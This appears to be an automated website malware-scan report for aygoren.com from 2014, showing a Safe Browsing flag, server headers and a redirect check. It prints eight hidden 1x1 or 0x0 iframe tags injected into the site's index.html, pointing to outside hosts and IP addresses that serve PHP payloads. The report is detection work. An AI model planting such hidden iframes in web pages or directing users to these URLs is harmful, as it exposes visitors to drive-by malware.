Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=aygoren.com
Result: The website is marked by Google as suspicious; visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://aygoren.com/ | HTTP/1.1 200 OK Date: Thu, 04 Sep 2014 17:58:15 GMT Accept-Ranges: bytes ETag: "7870c5ffca1cf1:bf7a5" Server: Microsoft-IIS/6.0 Content-Length: 4607 Content-Location: http://aygoren.com/index.html Content-Type: text/html Last-Modified: Thu, 17 Jul 2014 20:19:11 GMT X-Powered-By: ASP.NET | clean |
http://aygoren.com/index.html | 200 OK Content-Length: 4607 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
Antivirus reports:
Hidden iFrame found. size: 1x1 src: http://goo.gl/6ctl84 <iframe src="http://goo.gl/6ctl84" width="1" height="1">
Hidden iFrame found. size: 0x0 src: http://zabiyaka.org/file/ok.php <iframe src="http://zabiyaka.org/file/ok.php" width="0" height="0">
Malicious iFrame found. size: 1x1 src: http://23.90.4.184/etc/styles/zpanelx/img/ico/get.php This URL is marked by Google as suspicious <iframe src="http://23.90.4.184/etc/styles/zpanelx/img/ico/get.php" width="1" height="1">
Hidden iFrame found. size: 1x1 src: http://119.59.84.51/rotator/scripts/wow.html <iframe src="http://119.59.84.51/rotator/scripts/wow.html" width="1" height="1">
Hidden iFrame found. size: 1x1 src: http://119.59.84.51/java.php <iframe src="http://119.59.84.51/java.php" width="1" height="1">
Hidden iFrame found. size: 0x0 src: http://2gesichter.com/ok.php <iframe src="http://2gesichter.com/ok.php" width="0" height="0">
Hidden iFrame found. size: 1x1 src: http://gamedev.raconsultants.net/ok.php <iframe src="http://gamedev.raconsultants.net/ok.php" width="1" height="1">
Hidden iFrame found. size: 1x1 src: http://119.59.84.51/go.php <iframe src="http://119.59.84.51/go.php" width="1" height="1">
http://aygoren.com/test404page.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: aygoren.com
Result:
HTTP/1.1 200 OK
Date: Thu, 04 Sep 2014 17:58:15 GMT
Accept-Ranges: bytes
ETag: "7870c5ffca1cf1:bf7a5"
Server: Microsoft-IIS/6.0
Content-Length: 4607
Content-Location: http://aygoren.com/index.html
Content-Type: text/html
Last-Modified: Thu, 17 Jul 2014 20:19:11 GMT
X-Powered-By: ASP.NET
...4607 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: aygoren.com
Referer: http://www.google.com/search?q=aygoren.com
Result:
The result is similar to the first query. There are no suspicious redirects found.